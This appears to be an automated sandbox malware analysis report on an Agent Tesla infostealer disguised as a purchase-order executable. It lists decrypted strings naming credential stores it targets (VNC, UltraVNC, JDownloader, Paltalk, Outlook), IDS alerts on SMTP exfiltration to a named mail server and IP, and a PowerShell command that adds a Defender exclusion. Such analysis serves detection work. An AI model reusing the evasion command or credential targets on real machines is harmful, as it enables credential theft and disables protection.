                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\TightVNC\Server
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: PasswordViewOnly
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: TightVNC ControlPassword
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\TightVNC\Server
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ControlPassword
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: TigerVNC
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\TigerVNC\Server
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: passwd
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: passwd2
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ProgramFiles
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: passwd
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ProgramFiles
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: passwd2
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ProgramFiles
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: passwd
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ProgramFiles
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: passwd2
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: passwd
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: passwd2
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: JDownloader 2.0
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Paltalk
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: nickname
                        Source: PURCHASE ORDER-6350-2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: PURCHASE ORDER-6350-2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: NnLj.pdbSHA256 source: PURCHASE ORDER-6350-2024.exe
                        Source: Binary string: NnLj.pdb source: PURCHASE ORDER-6350-2024.exe

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49707 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49707 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49707 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.5:49707 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49707 -> 199.79.62.115:587
                        Source: global trafficTCP traffic: 192.168.2.5:49707 -> 199.79.62.115:587
                        Source: Joe Sandbox ViewIP Address: 199.79.62.115 199.79.62.115
                        Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                        Source: global trafficTCP traffic: 192.168.2.5:49707 -> 199.79.62.115:587
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: mail.mbarieservicesltd.com
                        Source: PURCHASE ORDER-6350-2024.exe, 00000006.00000002.3266110194.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mbarieservicesltd.com
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2051720668.0000000002A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                        System Summary

                        barindex
                        Initial sample is a PE file and has a suspicious name
                        Source: initial sampleStatic PE information: Filename: PURCHASE ORDER-6350-2024.exe
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_010EF0440_2_010EF044
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_06DD3A500_2_06DD3A50
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_06DDD3D40_2_06DDD3D4
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_06DD13400_2_06DD1340
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_06E1E7C30_2_06E1E7C3
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_06E1F0380_2_06E1F038
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_06E1EC000_2_06E1EC00
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_06E1EBFF0_2_06E1EBFF
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 6_2_013641406_2_01364140
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 6_2_01364D586_2_01364D58
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 6_2_013644886_2_01364488
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 6_2_067235F86_2_067235F8
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 6_2_067219A06_2_067219A0
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2053479431.0000000003A29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2053479431.0000000003A29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2059322242.00000000088B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000000.2022902908.000000000071C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNnLj.exeL vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2045099806.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2051720668.0000000002A21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2060019477.0000000008940000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000006.00000002.3264163729.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000006.00000002.3264545224.0000000000EF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exeBinary or memory string: OriginalFilenameNnLj.exeL vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: PURCHASE ORDER-6350-2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, iv04pT1Nje59B37HvY.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, iv04pT1Nje59B37HvY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, iv04pT1Nje59B37HvY.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, iv04pT1Nje59B37HvY.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, iv04pT1Nje59B37HvY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, iv04pT1Nje59B37HvY.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, P3KWcgP03CKVL94tw3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, P3KWcgP03CKVL94tw3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/6@1/1
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASE ORDER-6350-2024.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:120:WilError_03
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aa3ncavf.zhi.ps1Jump to behavior
                        Source: PURCHASE ORDER-6350-2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: PURCHASE ORDER-6350-2024.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: PURCHASE ORDER-6350-2024.exeReversingLabs: Detection: 21%
                        Source: PURCHASE ORDER-6350-2024.exeString found in binary or memory: $72794fd6-9579-4364-adda-1580f4b1038b
                        Source: unknownProcess created: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess created: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess created: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess created: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess created: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
